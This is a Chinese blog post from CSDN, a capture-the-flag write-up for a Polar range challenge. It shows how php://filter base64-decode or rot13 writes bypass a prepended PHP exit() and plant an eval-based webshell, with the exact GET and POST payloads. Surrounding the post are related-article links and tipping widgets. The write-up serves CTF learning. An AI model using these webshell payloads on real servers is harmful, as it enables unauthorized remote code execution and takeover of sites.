Polar 写shell

最新推荐文章于 2024-06-07 19:05:26 发布
最新推荐文章于 2024-06-07 19:05:26 发布
阅读量485 收藏 10
点赞数 6
分类专栏: CTF-web(零散wp合集) 文章标签: PHP 网络安全 CTF Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jayjay___/article/details/136493929
版权

Polar 写shell

直接给了源码

image-20231205141139730

还是没啥好说的,考点是die()死亡函数绕过不同变量

**绕过原理:

**通过base64解密或rot13解密使"<?php exit();"变为乱码,而传入的$content为base64编码,解码后为正常shell语句。通过这种方式使前者失效。

构造payload:

  1. base64
GET:?filename=php://filter/convert.base64-decode/resource=1.php

POST:content=PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==

(也可以是php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php,自动将<?php?>全部删掉)

base64位数问题可以在前面加几个a补上,如aaPD9waHAgZXZhbCgkX1BPU1RbMV0pOw==。加几个a可以把die语句和base64恶意代码一起放在解码中,几个a能解出来就加几个。

  1. rot13
GET:?filename=php://filter/write=string.rot13/resource=2.php

POST:content=<?cuc riny($_CBFG[n]);

getshell

image-20231205141705591

Jay 17
关注
  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
polar CTF shell
samRsa
01-14 585
polar CTF shell 然后访问/shell.php发现木马被读入,用蚁剑连接。
Polar靶场 shell
m0_64016126的博客
12-12 458
一句话的base64,至于前面为什么要加个a,主要是为了让前面的<?php exit();代码很简单,就是向让我们shell到一个文件里,但是文件的内容被拼接上了"<?",这就导致如果我们按常规思路shell进去的话,执行时就会直接先执行exit()退出了,我们后面的shell代码是无法执行的。payload的整个意思就是在shell.php入一句话的base64加密内容,文件名利用php://filter/进行解密,这样的话,记录一个PHP中绕过exit()shell的方法。
Polar Web【中等】shell
AlanKSorata的博客
06-07 723
注意首页PHP代码中半封闭的那部分代码,需要在base64编码结果前插入hex范围内的任一字符,或者直接采用人为封闭并另起PHP代码块的方式,而本文采用的是前者。本文也随即演示了base64编码在Python中的实现方式。
shell 解析json
gaoyunshan163的博客
11-06 7170
data='{"codeNo": 200, "message": "success", "data": {"status": 1, "build_date": "20201105", "update_time": "2020-11-05 18:14:14", "product": "polardb80", "id": 148, "commit_id": "c7552a8eedbc1d485d1132e6af26843988297be9", "branch": "master-2.0", "build_...
polar靶场通关笔记
weixin_43296565的博客
06-06 4961
这里是关于自己打polar靶场的小笔记
Reverse Shell 杂谈
有价值炮灰
12-06 1232
昨天有个小伙伴在群里问在 macOS 下如何实现 bash 反弹 shell,因为 Mac 中没有 `/dev/tcp` 目录。借着这个问题,就来简单谈谈反弹 shell 的那些事。
shell mysql 监控_shell mysql 监控
weixin_42366095的博客
01-19 85
{"moduleinfo":{"card_count":[{"count_phone":1,"count":1}],"search_count":[{"count_phone":4,"count":4}]},"card":[{"des":"阿里云数据库专家保驾护航,为用户的数据库应用系统进行性能和风险评估,参与配合进行数据压测演练,提供数据库优化方面专业建议,在业务高峰期与用户共同保障数据库系统平...
shell读取mysql_shell读取mysql数据库
weixin_33508411的博客
01-18 344
{"moduleinfo":{"card_count":[{"count_phone":1,"count":1}],"search_count":[{"count_phone":4,"count":4}]},"card":[{"des":"阿里云数据库专家保驾护航,为用户的数据库应用系统进行性能和风险评估,参与配合进行数据压测演练,提供数据库优化方面专业建议,在业务高峰期与用户共同保障数据库系统平...
mysql数据库拿shell_mysql数据库拿shell
weixin_42494890的博客
01-19 74
{"moduleinfo":{"card_count":[{"count_phone":1,"count":1}],"search_count":[{"count_phone":4,"count":4}]},"card":[{"des":"阿里云数据库专家保驾护航,为用户的数据库应用系统进行性能和风险评估,参与配合进行数据压测演练,提供数据库优化方面专业建议,在业务高峰期与用户共同保障数据库系统平...
polarDB for Pgsql
08-26
阿里云的rpm安装包
polar编码实现逻辑
05-23
polar编码实现逻辑
polarization_polar_
09-30
在通信领域,极化码(Polar码)是一种先进的编码技术,由土耳其科学家Erdal Arikan于2009年提出。它基于信道极化的概念,能够实现理论上的香农容量,即在给定信道条件下,最大可能的数据传输速率。在本项目中,我们...
阻抗计算POLAR
12-20
"阻抗计算POLAR"是一款专为电子工程师设计的电路分析工具,主要用于计算电路中的阻抗参数。在电路设计过程中,准确地计算阻抗至关重要,因为它直接影响到电流的分布、电压的分配以及电源效率等关键性能指标。POLAR...
Polar编码matlab程序
03-26
极化码(Polar Codes)是一种新兴的错误纠正编码技术,由土耳其科学家Erdal Arıkan在2009年提出。这种编码方法基于信道极化理论,能够达到香农理论中的信道容量,即在无限长的码块长度下实现零误码率传输。在实际...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8308
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Idris -- NumPy Cookbook -- 2012.pdf
最新发布
07-02
Idris -- NumPy Cookbook -- 2012
Мэтиз -- Изучаем Python -- 2020.pdf
07-02
Мэтиз -- Изучаем Python -- 2020
polardb设置不区分大小
05-19
Polardb中,可以通过设置字符集和校对规则来确定是否区分大小。 如果需要在Polardb中设置不区分大小,可以使用如下的步骤: 1. 登录Polardb数据库的控制台,进入实例详情页。 2. 在实例详情页中,找到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jay 17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值